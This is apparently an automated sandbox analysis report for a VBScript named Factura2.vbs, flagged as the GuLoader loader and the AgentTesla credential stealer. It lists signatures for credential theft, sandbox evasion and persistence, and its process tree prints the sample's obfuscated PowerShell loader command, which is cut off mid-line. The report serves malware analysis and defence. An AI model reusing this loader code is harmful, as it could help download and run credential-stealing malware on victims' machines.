Edit tour
Windows
Analysis Report
Factura2.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6268 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Factu ra2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 5672 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Enchodon toid = 1;$ Multinerva te='Substr in';$Multi nervate+=' g';Functio n Pisseskn ($Parate){ $Nongelati nizing=$Pa rate.Lengt h-$Enchodo ntoid;For( $Agrestica l=5; $Agre stical -lt $Nongelat inizing; $ Agrestical +=(6)){$De xtranase88 +=$Parate. $Multinerv ate.Invoke ($Agrestic al, $Encho dontoid);} $Dextranas e88;}funct ion Saprop hagan($Fac tories){. ($Lau rikke) ($F actories); }$Hovedvrk er=Pissesk n 'addleMS ,steo .and zConfoi Ve jrl ReavlP rintaB.une /Ca,ro5.ic it.Choos0S kide Lnnin (DuellW de siiMonopnW ap.kdSavan oIslanwdoe rcs Emer B romNUoverT Axopo Opri .1Allia0Fo rel.Vaing0 comb;Angr e DecorWGr aeni Femin G.in6Kurs u4Ect,c;ko tr Parenx tyede6Tri, h4taffe;Ph ary Elle,r ,uresv Kip e:,eseg1Hj emm2Hjlpe1 klogt. ign e0Prd k) H ove AlterG Dis aeJonn hcStrafkF, rudoPseud/ St,w2R vh u0Digi.1,e cir0Fersk0 nakke1K.as s0 Mese1 i eld OsphrF Klon.iFema arKlebieBr ontf S.tyo AmtsrxBort e/ Fron1Ex cla2Butto1 Publ.Sves k0Handl '; $Nuanceret =Pisseskn ' SdelURep ansMedhoeH e.lirPar a -El,vaAUka segPoca,eM agtkn divv tIodat ';$ unshady=Pi sseskn 'Xy lo.h Rabbt Halfhtmika ,pt,lles A yyu: Un,o/ Inka/D.kk edBo edrDi cari Berav Pl,caeCo.p a.Dem bg H usnoVelbeo Bann,gAnno ,lTandsede gne. Swinc Fel,oReba nmDemou/En dkkuDieumc Ad oc?Dag oeS,rtlx s adapBhakto nond r Udt rtG imr=To bacdDefrao cl.ngwVkke nWeakalFu lfioPlatoa Fo.stdStor b&KlbesiPe ssudBatte= Stv r1Oner aTSpermE,e lveIMesmen re.tJSkol euFidg.NSt opne ,rsta himmeiAbio l- TaleSCo ntrRBes.iI Barbo4 Und eC emibSup pl4Freed0 DagdUTartr 9Aeropk.el efrUdsy,lE xecu2Trave XCoemp7Ant irxHypoej MbelD,imel g reenG.or sc ';$Dous ers=Pisses kn 'T llb> Reimm ';$L aurikke=Pi sseskn 'Af pluigrlige DemorxLuck f ';$Flyve stolene = Pisseskn ' UnwoeKil. bcvibrihOp splo.ibbe mic,o%daiq uaHeroepGo ldepUd,krd Steelatum. dtOustia A ,ch%Brsli\ PorcM Shi feSinopr T ykeoMythog SkorsaSkat sGastrt T rihrIntrau Pu.sl.iun taCentr.Di gamB autoe GrammsHous e Pid.l&Gr umo&Und p Delfe Sst. cp,rtuhPig meoFrt s T oppl$Objec ';Saproph agan (Piss eskn ' Pun k$ Di ogSa valSlagbo S bubUnsc aa fluelMi sl.:OmbytA L.mbasQuee sIdioteUl empv Joure TimbrrNaad ia.usiktNo ng.iOrgann Indbrg ont i=U,ear(F attcVelsem StevedNe h u Eks m/Om skrcLetfr ota$ Vent FKern.lSci opy .igtv ReleeS,les s Snakt Tr adoU.bell Fireecoelo nTot.ee ma lt)Afspn ' );Sapropha gan (Pisse skn 'junke $ nsig App alunderoep ipabIsraea Lit.lpres u:ParitFGa vend Syfir Gra.ue ven dnNonpreRe sidh Chanj Hardme Bed rm Stil= C hil$ armu SponnPa.kl sBagflh.ed bia epowdB e,tsy.icla .Daa,esNri ngpUnexplO perci scat .ornb( dru d$ ApolDGi ftioObjeku DenatsT,ef oePhr.tr U noxsIndkr) Vel.o ');$ unshady=$F